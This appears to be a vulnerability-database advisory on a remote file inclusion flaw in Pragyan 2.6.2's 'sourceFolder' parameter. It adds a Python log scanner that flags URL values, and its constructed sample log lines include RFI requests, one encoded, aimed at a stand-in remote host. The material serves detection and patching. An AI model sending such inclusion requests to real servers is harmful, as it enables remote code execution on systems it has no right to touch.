vendor: Pragyan
by: N3TR00T3R
CVSS: 7.5 HIGH
Remote File Inclusion
CWE: 98
Product Name: Pragyan
Affected Version From: 2.6.2
Affected Version To: 2.6.2
Patch Exists: YES
Related CWE: N/A
CPE: a:pragyan:pragyan:2.6.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
pragyan 2.6.2 Remote File Inclusion
A remote file inclusion vulnerability exists in Pragyan 2.6.2. The application fails to properly sanitize user-supplied input to the 'sourceFolder' parameter in the 'form.lib.php' script. An attacker can exploit this by sending a maliciously crafted HTTP request containing a URL in the 'sourceFolder' parameter, which can allow the attacker to execute arbitrary code on the vulnerable system.
Mitigation:
The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Pragyan.
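For systems that cannot be upgraded immediately, web access logs can be checked for the request pattern described above. The following is an added example, not code from Pragyan or from the original advisory: it flags requests whose 'sourceFolder' value decodes to a URL. The log lines are constructed, the `/PLACEHOLDER/` path stands in for the script's real location (not given on this page), and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A value that starts with "scheme://" or "//host" is a URL, not a local folder.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PARAM = "sourcefolder"  # parameter named in the advisory, matched case-insensitively


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2568ttp) up to a bounded depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_source_folder(log_line):
    """Return the decoded sourceFolder value if it is a URL, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() == PARAM:
            value = fully_decode(value)  # parse_qsl already decoded one layer
            if REMOTE.match(value):
                return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = ((n, suspicious_source_folder(line)) for n, line in enumerate(lines, 1))
    return [(n, value) for n, value in hits if value]


SAMPLE_LOG = [  # constructed entries; /PLACEHOLDER/ is not the real path
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /PLACEHOLDER/form.lib.php?sourceFolder=cms/modules/form HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2008:10:00:05 +0000] "GET /PLACEHOLDER/form.lib.php?sourceFolder=http://remote.example.test/x HTTP/1.1" 200 734',
    '203.0.113.5 - - [01/Jan/2008:10:00:09 +0000] "GET /PLACEHOLDER/form.lib.php?sourceFolder=%2568ttp%253A%252F%252Fremote.example.test%252Fx HTTP/1.1" 200 734',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: sourceFolder -> {value}")
```

Access logs normally record only the query string, so a 'sourceFolder' value sent in a POST body will not be seen by this check.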